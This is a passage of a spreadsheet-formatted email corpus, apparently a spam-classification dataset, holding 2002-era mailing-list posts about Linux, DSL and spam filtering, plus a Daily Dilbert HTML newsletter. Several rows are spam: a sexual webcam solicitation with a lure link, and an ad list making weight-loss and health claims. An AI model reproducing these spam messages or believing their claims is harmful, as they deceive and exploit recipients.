 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
 U4AIIAYAAAAAAMAAAAAAAABGAAAAAAGFAAAAAAAAAgH4DwEAAAAQAAAAp2s48mMWVEy0NPc3EPql
 7wIB+g8BAAAAEAAAAKdrOPJjFlRMtDT3NxD6pe8CAfsPAQAAAKUAAAAAAAAAOKG7EAXlEBqhuwgA
 KypWwgAAUFNUUFJYLkRMTAAAAAAAAAAATklUQfm/uAEAqgA32W4AAABDOlxEb2N1bWVudHMgYW5k
 IFNldHRpbmdzXEFkbWluaXN0cmF09nJcTG9rYWxhIGluc3TkbGxuaW5nYXJcQXBwbGljYXRpb24g
 RGF0YVxNaWNyb3NvZnRcT3V0bG9va1xvdXRsb29rLnBzdAAAAAADAP4PBQAAAAMADTT9NwAAAgF/
 AAEAAAAuAAAAPEZFRU1MRURFRkFGTUNJQUlNR1BKR0VOUENDQUEubWFuZ3JvQGhvbWUuc2U+AAAA
 AwAGEK7BhA0DAAcQewEAAAMAEBAAAAAAAwAREAAAAAAeAAgQAQAAAGUAAABJV09VTERMSUtFVE9J
 TlNUQUxMUlBNSVRTRUxGSUhBVkVUUklFRFRPR0VUVEhFSU5GT1JNQVRJT05CWVZJU0lUSU5HV1dX
 UlBNT1JHPEhUVFA6Ly9XV1dSUE1PUkdBTkRUSEVSAAAAAIGM
 ------=_NextPart_000_0002_01C23817.94245ED0--
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG-Social] my webcam is on babe!
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, my name is Kelly, I am an 18 year old swimming instructor from Longbeach.  I am intelligent, sexy and discreet. I love to laugh and have fun. Like most young girls, i like to go out with my friends and dance all night. When I'm home and have nothing to do, I love to chat and be naughty n naked on my webcam. 
 Get a chance to catch me "LIVE" on my webcam. I'm waiting for you....
 http://www.site-personals.com  &lt;---click and access me instantly hunnie;)
 later baby,
 mmwa!
 ewidvtdksrvaptnjsvsgeqcpafu
 -- 
 Irish Linux Users' Group Social Events: social@linux.ie
 http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">
 On Thu, Aug 15, 2002 at 05:46:55PM -0400, Luis Villa wrote:
 &gt; FWIW, slummerville actually has the internet- not just broadband, but
 &gt; actual broadband competition, which I gather is rare. I had ADSL and two
 &gt; cable options when I moved in.
 Did you actually attempt to order the DSL? Large chunks of somerville have
 advertised DSL service that can't actually be obtained. Excuses vary, from
 "no available copper" to "full DSLAM", but the folks I know who've wanted
 DSL around here have all failed, ending up either with ATTBB, RCN or an
 honest-to-god T1.
         -j
 &gt; 
 &gt; Luis
 &gt; 
 -- 
 jesse reed vincent -- root@eruditorum.org -- jesse@fsck.com 
 70EBAC90: 2A07 FC22 7DB4 42C1 9D71 0108 41A3 3FB3 70EB AC90
 This is scary.  I'm imagining tracerouting you and seeing links like "Route
 84" and "Route 9, Exit 14".  Obviously, this is illness induced. 
 								--Cana McCoy
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, 21 Jul 2002 10:51:51 -0500
 Brian Fahrlander &lt;kilroy@kamakiriad.com&gt; wrote:
 &gt; [branching the thread, here]
 &gt; 
 &gt;     I found another Ximian repository- I don't know if it works yet...
 &gt; 
 &gt; rpm     http://gstreamer.net/releases/redhat/ redhat-73-i386 deps
 &gt; rpm-src http://gstreamer.net/releases/redhat/ redhat-73-i386 deps
 &gt; 
 &gt; rpm     http://gstreamer.net/releases/redhat/ redhat-73-i386 deps ximian
 &gt; rpm-src http://gstreamer.net/releases/redhat/ redhat-73-i386 deps ximian
 &gt; 
 &gt; rpm     http://gstreamer.net/releases/redhat/ redhat-73-i386 deps gnomehide
 &gt; rpm-src http://gstreamer.net/releases/redhat/ redhat-73-i386 deps gnomehide
 &gt; 
 &gt;     These guys are EXTREMELY apt-friendly.  Unlike most multimedia projects, they seem to prefer RPM/Apt over the older methods.  Isn't that cool?
 &gt; 
 &gt;     Hey- how would I have known to "apt-get install gnome-session" to kick all this off?
 &gt; 
 &gt; ------------------------------------------------------------------------
 &gt; Brian Fahrlnder              Linux Zealot, Conservative, and Technomad
 &gt; Evansville, IN                    My Voyage: http://www.CounterMoon.com
 &gt; ICQ  5119262
 &gt; ------------------------------------------------------------------------
 &gt; I don't want to hear news from Isreal until the news contains the words
 &gt; "Bullet", "Brain", and "Arafat".
 i took a look into the repository it "just" contains gstreamer and his dependecies
 but thats nice for people who use it though :)
 thanks,
 che
 personally i am capped to 16 kb/s upstream only :\ if i just had like 10 to 20 times of that i would run a repository for sure. i guess alot of people would love to even get daily builds (yes i know i deserve to be eaten for that idea because it would need alot of bandwidth) but well would still be nice :).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</si>
  <si>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Subject: [Razor-users] How to test razor
</t>
  </si>
  <si>
    <t xml:space="preserve">I have a spamd/spamc/razor/dcc setup.
 My razor logs are full of:
 Sep 10 09:48:48.411339 check[10200]: [ 1] [bootup] Logging initiated 
 LogDebugLevel=3 to file:/home/omega13/.razor/razor-agent.log
 Sep 10 09:48:49.391309 check[10200]: [ 3] mail 1 is not known spam.
 The problem is that all the entries show "is not known spam"  I can't believe 
 I'm that lucky.  So, how do I test to see that my razor installation is 
 working properly.  I've been up to my ears in documentation for the past few 
 days, so, if the reference is easy, just point me to it.  Otherwise a brief 
 hint on how to, would be appreciated.
 -- 
 Robin Lynn Frank
 Paradigm-Omega, LLC
 ==================================
 Gandalf fell at Khazadum.
 Sheridan fell at Z'ha'dum.
 Avoid high places in 
 locations ending in "dum"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</si>
  <si>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Encryption approach to secure web applications
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,
 Thank you for the useful replies, I have found some interesting 
 tutorials in the ibm developer connection.
 https://www6.software.ibm.com/developerworks/education/j-sec1
 and
 https://www6.software.ibm.com/developerworks/education/j-sec2
 Registration is needed.
 I will post the same message on the Web Application Security list, as 
 suggested by someone.
 For now, I thing I will use md5 for password checking (I will use the 
 approach described in secure programmin fo linux and unix how-to).
 I will separate the authentication module, so I can change its 
 implementation at anytime.
 Thank you again!
 Mario Torre
 -- 
 Please avoid sending me Word or PowerPoint attachments.
 See http://www.fsf.org/philosophy/no-word-attachments.html 
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; &gt; Ok, Iknow this is blatantly OT but I'm beginning to go insane.
 &gt; &gt; Had an old Dell Dimension XPS sitting in the corner and decided to
 &gt; &gt; put it to use, I know it was working pre being stuck in the
 &gt; &gt; corner, but when I plugged it in, hit the power nothing happened.
 &gt; &gt; I opened her up and had a look and say nothing much. A little orange
 &gt; &gt; LED comes on when I plug her in but that's it, after some googling
 &gt; &gt; I found some reference to re-seating all the parts, but no change.
 &gt; &gt; The problem I'm having is that since the power supply is some Dell
 &gt; &gt; specific one, ATX block with what looks like one of the old AT
 &gt; &gt; power connectors, I cant figure out weather this is a Mobo prob
 &gt; &gt; or a PSU prob. Just to futily try and drag this back OT, I want
 &gt; &gt; to install Linux on it when I get it working. If anyone knows
 &gt; &gt; what the problem might be give me a shout.
 Ie if you are getting a little orange LED when you plug it in then your PSU
 is probably working.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">
 What are you trying to sell???? What is the Value???
 Example...Does Pratchett sell paper bound by glue or does he sell stories?
 Question...When I buy a book have I purchased the story? When I sell the
 book does any of that revenue go to mr Pratchett?
 What if I read the book and  give it to someone, who then reads it
 and gives it  to someone who then reads it and gives it to
 someones....(bookcrossing.com though with  more succesfull passings). Does
 each reader send Mr Pratchett money?
 Have Used Bookstores, Recorstores etc destroyed the system of book/record
 economy?
 AS to the resident sourpuss, in germany bitter may be better but here its
 just plain stinkin thinkin.
 -tom
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Get the Child Support You Deserve                     10.132
</t>
  </si>
  <si>
    <t xml:space="preserve">1) Fight The Risk of Cancer!
 http://www.adclick.ws/p.cfm?o=315&amp;s=pk007
 2) Slim Down - Guaranteed to lose 10-12 lbs in 30 days
 http://www.adclick.ws/p.cfm?o=249&amp;s=pk007
 3) Get the Child Support You Deserve - Free Legal Advice
 http://www.adclick.ws/p.cfm?o=245&amp;s=pk002
 4) Join the Web's Fastest Growing Singles Community
 http://www.adclick.ws/p.cfm?o=259&amp;s=pk007
 5) Start Your Private Photo Album Online!
 http://www.adclick.ws/p.cfm?o=283&amp;s=pk007
 Have a Wonderful Day,
 Offer Manager
 PrizeMama
 If you wish to leave this list please use the link below.
 http://www.qves.com/trim/?ilug@linux.ie%7C17%7C114258
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re[2]: Forged whitelist spam
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, 11 Aug 2002 bitbitch@magnesium.net wrote:
 &gt; You mean like on mac keyboards :-)    Or laptops (which are as damn
 Yeah, I was thinking of the G4 keyboard when I wrote this. Otherwise lousy
 feel and key placement, though. (That's why I'm holding on to my IBM Model
 M Space Saver. Once I get an PS2 to USB converter, I expect it will
 outlive several generations of computer hardware).
 Very good for sticking in USB fobs into, though. CRTs/LCD panels are even 
 better for that, though.
 &gt; near close to keyboard/usb connection as one can get, without the real
 &gt; thing)
 I think laptops are largely useless because of the battery and the 
 keyboard issue.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Kenn Humborg wrote:
 &gt;&gt;Cheers All for your words of wisdom.
 &gt;&gt;
 &gt;&gt;I came across this which has worked a treat:-
 &gt;&gt;
 &gt;&gt;http://www.avdf.com/mar97/art_autorun.html
 &gt; 
 &gt; 
 &gt; (This is all Windows-related autorun stuff).
 Which was obvious since he mentioned:
 `start file.html`
 And the reason I didn't reply, Doh!
 Pdraig.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Your Daily Dilbert 07/13/2002
</t>
  </si>
  <si>
    <t xml:space="preserve">--15263843.1026556855445.JavaMail.root.umsan1
 Content-Type: text/plain; charset=ISO-8859-1
 Content-Transfer-Encoding: 7bit
 E-mail error
 You're subscribed to the HTML version of the Daily Dilbert,
 which shows the comic strip as a graphic, but your mail system
 either can't support HTML or is set up to remove HTML content. For
 more information, contact your Internet service provider or mail
 system administrator.
 To change to a plain text subscription, modify your account
 preferences at 
 http://www.dilbert.com/comics/dilbert/daily_dilbert/html/login.html
 The plain text option appears toward the bottom of the modification
 page.
 --15263843.1026556855445.JavaMail.root.umsan1
 Content-Type: text/html; charset=ISO-8859-1
 Content-Transfer-Encoding: quoted-printable
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;TITLE&gt;Daily Dilbert&lt;/TITLE&gt;
 &lt;meta http-equiv=3D"pragma" content=3D"no-cache"&gt;
 &lt;META HTTP-EQUIV=3D"expires" CONTENT=3D"0"&gt;
 &lt;meta http-equiv=3D"Cache-control" content=3D"no-cache"&gt;
 &lt;/HEAD&gt;
 &lt;BODY BGCOLOR=3D"#336699" text=3D"#000000" link=3D"#000000" vlink=3D"#00339=
 9" alink=3D"#3333CC" MARGINWIDTH=3D"0" MARGINHEIGHT=3D"8" LEFTMARGIN=3D"0" =
 TOPMARGIN=3D"8"&gt;
 &lt;TABLE WIDTH=3D"100%" BORDER=3D"0" CELLPADDING=3D"0" BGCOLOR=3D"#336699"&gt;
 &lt;TR&gt;
 &lt;TD BGCOLOR=3D"#336699" WIDTH=3D"15"&gt;&lt;IMG SRC=3D"http://www.comics.com/comi=
 cs/dilbert/images/clear_dot.gif" WIDTH=3D"15" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 &lt;TD BGCOLOR=3D"#336699"&gt;
 &lt;SCRIPT LANGUAGE=3D"JAVASCRIPT"&gt;
 &lt;!--=20
 function rand(n)=20
 {
 seed =3D (0x015a4e35 * seed) % 0xfffffff;
 return (seed &gt;&gt; 16) % n;
 }
 var now =3D new Date ();
 var seed =3D now.getTime() % 0xffffffff;
 var same =3D rand(1000);
 // End hiding script from old browsers --&gt;
 &lt;/SCRIPT&gt;
 &lt;SCRIPT Language=3D"JavaScript"&gt;
 &lt;!-- hide from old browsers
   var today =3D new Date()
 //--&gt;
 &lt;/SCRIPT&gt;
 &lt;!-- CONTENT AND SKYSCRAPER AD TABLE BEGIN --&gt;
 &lt;TABLE CELLPADDING=3D"0" CELLSPACING=3D"0" BORDER=3D"0"&gt;
 =09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09&lt;TD BGCOLOR=3D"#336699"&gt;
 =09=09=09&lt;!-- AD TABLE BEGIN --&gt;
 =09=09=09&lt;TABLE WIDTH=3D"627" CELLPADDING=3D"0" CELLSPACING=3D"0" BORDER=3D=
 "0"&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"468" BGCOLOR=3D"#336699"&gt;&lt;IMG SRC=3D"http://www=
 .comics.com/comics/dilbert/images/small_ad.gif" WIDTH=3D"20" HEIGHT=3D"11" =
 BORDER=3D"0" ALT=3D"Advertisement"&gt;&lt;BR&gt;&lt;IMG SRC=3D"http://www.comics.com/co=
 mics/dilbert/images/clear_dot.gif" WIDTH=3D"1" HEIGHT=3D"1" BORDER=3D"0" AL=
 T=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"21" BGCOLOR=3D"#336699" ROWSPAN=3D"2"&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"21"=
  HEIGHT=3D"72" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"120" BGCOLOR=3D"#336699"&gt;&lt;IMG SRC=3D"http://www=
 .comics.com/comics/dilbert/images/small_ad.gif" WIDTH=3D"20" HEIGHT=3D"11" =
 BORDER=3D"0" ALT=3D"Advertisement"&gt;&lt;BR&gt;&lt;IMG SRC=3D"http://www.comics.com/co=
 mics/dilbert/images/clear_dot.gif" WIDTH=3D"1" HEIGHT=3D"1" BORDER=3D"0" AL=
 T=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"18" BGCOLOR=3D"#336699" ROWSPAN=3D"2"&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"18"=
  HEIGHT=3D"72" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09
 =09=09=09=09
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"468" BGCOLOR=3D"#336699"&gt;
 =09=09=09=09=09&lt;!-- BEGIN ENHANCED CREATIVE --&gt;
 =09=09=09=09=09&lt;SCRIPT LANGUAGE=3D"JavaScript"&gt;
 =09=09=09=09=09&lt;!--
 =09=09=09=09=09document.write ('&lt;TABLE WIDTH=3D"468" CELLSPACING=3D"0" CELL=
 PADDING=3D"0" BORDER=3D"0"&gt;&lt;TR VALIGN=3D"TOP"&gt;&lt;TD ALIGN=3D"LEFT"&gt;&lt;ILAYER ID=
 =3Dph1 VISIBILITY=3Dhidden width=3D"468" height=3D"60"&gt;&lt;/ILAYER&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;=
 /TABLE&gt;');
 =09=09=09=09=09document.write ('&lt;NOLAYER&gt;');
 =09=09=09=09=09document.write ('&lt;IFRAME SRC=3D"http://ad.doubleclick.net/ad=
 i/dilbert.email.com/email/;sz=3D468x60;ptile=3D1;ord=3D' + same + '?" name=
 =3D"frame1" width=3D"468" height=3D"60" frameborder=3D"no" border=3D"0" MAR=
 GINWIDTH=3D"0" MARGINHEIGHT=3D"0" SCROLLING=3D"no"&gt;');
 =09=09=09=09=09document.write ('&lt;A target=3D"_blank" HREF=3D"http://ummail4=
 .unitedmedia.com:80/Click?q=3D1b-wAdhI3NAIaJHtebQ1X5Z4ZDSRRRR"&gt;');
 =09=09=09=09=09document.write ('&lt;IMG SRC=3D"http://ad.doubleclick.net/ad/di=
 lbert.email.com/email/;abr=3D!ie;sz=3D468x60;ptile=3D1;ord=3D' + same + '?"=
  border=3D"0" WIDTH=3D"468" HEIGHT=3D"60"&gt;&lt;/A&gt;&lt;/IFRAME&gt;');
 =09=09=09=09=09document.write ('&lt;/NOLAYER&gt;');=20
 =09=09=09=09=09//--&gt;
 =09=09=09=09=09&lt;/SCRIPT&gt;
 =09=09=09=09=09&lt;NOSCRIPT&gt;
 =09=09=09=09=09&lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:=
 80/Click?q=3D30-u8jEIRrZEC1Lz788IlOUGDJ7NdRR"&gt;&lt;IMG SRC=3D"http://ad.doublec=
 lick.net/ad/dilbert.email.com/email/;abr=3D!ie;sz=3D468x60;ptile=3D1;ord=3D=
 1986839?" BORDER=3D"0" WIDTH=3D"468" HEIGHT=3D"60"&gt;&lt;/a&gt;
 =09=09=09=09=09&lt;/NOSCRIPT&gt;
 =09=09=09=09=09&lt;!-- END ENHANCED CREATIVE --&gt;&lt;/TD&gt;
 =09=09=09=09=09
 =09=09=09=09=09
 =09=09=09=09=09
 =09=09=09=09=09&lt;TD WIDTH=3D"120" BGCOLOR=3D"#336699"&gt;&lt;IMG SRC=3D"http://www=
 .comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"1" HEIGHT=3D"1" B=
 ORDER=3D"0" ALT=3D""&gt;&lt;BR&gt;&lt;A target=3D"_blank" HREF=3D"http://ummail4.united=
 media.com:80/Click?q=3D45-fNgJIKBR8VqOZaJ-EGvB0UNgJdRR"&gt;&lt;IMG SRC=3D"http://=
 www.comics.com/comics/dilbert/daily_dilbert/images/dilbert_tshirt_120x60.gi=
 f" WIDTH=3D"120" HEIGHT=3D"60" BORDER=3D"0" ALT=3D"Shop Dilbert"&gt;&lt;/A&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09
 =09=09=09=09
 =09=09=09=09
 =09=09=09=09
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"627" HEIGHT=3D"10" COLSPAN=3D"4"&gt;&lt;IMG SRC=3D"ht=
 tp://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"627" HEIG=
 HT=3D"10" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09&lt;/TABLE&gt;
 =09=09=09&lt;!-- AD TABLE END --&gt;
 =09=09=09
 =09=09=09&lt;!-- HEADER TABLE BEGIN --&gt;
 =09=09=09&lt;TABLE WIDTH=3D"627" CELLPADDING=3D"0" CELLSPACING=3D"0" BORDER=3D=
 "0"&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"515" BGCOLOR=3D"#336699" ROWSPAN=3D"3"&gt;&lt;A targe=
 t=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D6f-3xY9IOL=
 2bBm-PFh3RUvKTN9nPsRR"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/dai=
 ly_dilbert/images/daily_dilbert_header_left.gif" WIDTH=3D"515" HEIGHT=3D"76=
 " BORDER=3D"0" ALT=3D"Daily Dilbert"&gt;&lt;/A&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"90" BGCOLOR=3D"#336699"&gt;&lt;IMG SRC=3D"http://www.=
 comics.com/comics/dilbert/daily_dilbert/images/daily_dilbert_header_mid_top=
 .gif" WIDTH=3D"90" HEIGHT=3D"55" BORDER=3D"0" ALT=3D"Daily Dilbert"&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"5" BGCOLOR=3D"#336699" ROWSPAN=3D"3"&gt;&lt;IMG SRC=
 =3D"http://www.comics.com/comics/dilbert/daily_dilbert/images/daily_dilbert=
 _header_right.gif" WIDTH=3D"5" HEIGHT=3D"76" BORDER=3D"0" ALT=3D"Daily Dilb=
 ert"&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"17" ROWSPAN=3D"3"&gt;&lt;IMG SRC=3D"http://www.comics=
 .com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"17" HEIGHT=3D"10" BORDER=
 =3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09
 =09=09=09=09&lt;!-- ENTER DATE HERE --&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"90" BGCOLOR=3D"#003366" HEIGHT=3D"13"&gt;&lt;FONT FAC=
 E=3D"helvetica, arial" SIZE=3D"1" COLOR=3D"#FFFFFF"&gt;&lt;B&gt;07/13/2002&lt;/B&gt;&lt;/FONT=
 &gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"90" BGCOLOR=3D"#336699"&gt;&lt;IMG SRC=3D"http://www.=
 comics.com/comics/dilbert/daily_dilbert/images/daily_dilbert_header_mid_bot=
 tom.gif" WIDTH=3D"90" HEIGHT=3D"8" BORDER=3D"0" ALT=3D"Daily Dilbert"&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09&lt;/TABLE&gt;
 =09=09=09&lt;!-- HEADER TABLE END --&gt;
 =09=09=09
 =09=09=09&lt;!-- WHITE LINE AND GREETING TABLE BEGIN --&gt;
 =09=09=09&lt;TABLE WIDTH=3D"627" CELLPADDING=3D"0" CELLSPACING=3D"0" BORDER=3D=
 "0"&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"1" HEIGHT=3D"2" BGCOLOR=3D"#003366"&gt;&lt;IMG SRC=3D=
 "http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"1" HEI=
 GHT=3D"2" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"605" HEIGHT=3D"2" BGCOLOR=3D"#FFFFFF" COLSPAN=
 =3D"2"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"605" HEIGHT=3D"2" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"4" HEIGHT=3D"2" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D=
 "http://www.comics.com/comics/dilbert/daily_dilbert/images/white_line_right=
 .gif" WIDTH=3D"4" HEIGHT=3D"2" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"17" HEIGHT=3D"48" ROWSPAN=3D"4"&gt;&lt;IMG SRC=3D"htt=
 p://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"17" HEIGHT=
 =3D"48" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"1" HEIGHT=3D"37" BGCOLOR=3D"#003366" ROWSPAN=3D=
 "2"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" =
 WIDTH=3D"1" HEIGHT=3D"39" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"605" HEIGHT=3D"5" BGCOLOR=3D"#FFCC66" COLSPAN=
 =3D"2"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"605" HEIGHT=3D"7" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"4" HEIGHT=3D"37" BACKGROUND=3D"http://www.comic=
 s.com/comics/dilbert/daily_dilbert/images/ffcc66_right.gif" ROWSPAN=3D"2"&gt;&lt;=
 IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=
